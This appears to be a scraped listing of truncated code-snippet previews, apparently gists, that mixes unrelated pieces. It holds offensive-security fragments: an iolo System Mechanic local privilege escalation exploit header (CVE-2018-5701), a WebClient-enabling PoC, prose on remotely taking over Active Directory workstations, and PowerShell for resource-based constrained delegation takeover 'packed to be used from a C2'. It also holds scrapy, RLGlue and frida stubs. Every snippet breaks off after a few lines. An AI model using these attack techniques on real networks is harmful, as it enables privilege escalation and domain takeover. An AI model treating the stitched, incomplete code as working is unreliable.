| import random | |
| import sys | |
| import struct | |
| import io | |
| from ctypes import windll, POINTER, byref | |
| from ctypes.wintypes import LPVOID, DWORD, LPCSTR, LPSTR, BOOL, HANDLE | |
| from enum import Enum | |
| ''' | |
| #define IOCTL_HEVD_TYPE_CONFUSION 0x222023 |
| # Exploit title: iolo System Mechanic Pro v. <= 15.5.0.61 - Arbitrary Write Local Privilege Escalation (LPE) | |
| # Exploit Authors: d3adc0de | |
| # CVE: CVE-2018-5701 | |
| # Date: 01/06/2021 | |
| # Vendor Homepage: https://www.iolo.com/ | |
| # Download: https://www.iolo.com/products/system-mechanic-ultimate-defense/ | |
| # https://mega.nz/file/xJgz0QYA#zy0ynELGQG8L_VAFKQeTOK3b6hp4dka7QWKWal9Lo6E | |
| # Version: v.15.5.0.61 | |
| # Tested on: Windows 10 Pro x64 v.1903 Build 18362.30 | |
| # Category: local exploit |
Some golden links when you are having issues: https://social.technet.microsoft.com/Forums/windows/en-US/96016a13-9062-4842-b534-203d2f400cae/ca-certificate-request-error-quotdenied-by-policy-module-0x80094800quot-windows-server-2008?forum=winserversecurity
Download and install Certi
| using System.Runtime.InteropServices; | |
| using System; | |
| /* | |
| * Simple C# PoC to enable WebClient Service Programmatically | |
| * Based on the C++ version from @tirannido (James Forshaw) | |
| * Twitter: https://twitter.com/tiraniddo | |
| * URL: https://www.tiraniddo.dev/2015/03/starting-webclient-service.html | |
| * | |
| * Compile with: |
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
| function Invoke-GenericWriteRBCD | |
| { | |
| <# Based on Gist by dirkjan - Packed to be used from a C2 #> | |
| [CmdletBinding()] | |
| param | |
| ( | |
| [Parameter(Mandatory=$True, HelpMessage="The name for the newly created computer")] | |
| [string]$Computer, |
| # -*- coding: utf-8 -*- | |
| import scrapy | |
| import argparse | |
| import re | |
| from scrapy import signals | |
| from scrapy.spiders import CrawlSpider, Rule | |
| from scrapy.linkextractors import LinkExtractor | |
| from scrapy.crawler import CrawlerProcess | |
| class RLGlue: | |
| """RLGlue class | |
| args: | |
| env_name (string): the name of the module where the Environment class can be found | |
| agent_name (string): the name of the module where the Agent class can be found | |
| """ | |
| def __init__(self, env_class, agent_class): | |
| self.environment = env_class() | |
| self.agent = agent_class() |
| import frida | |
| import sys | |
| import subprocess | |
| import ctypes | |
| import threading | |
| import multiprocessing | |
| import argparse | |
| def inject_dummy(): |
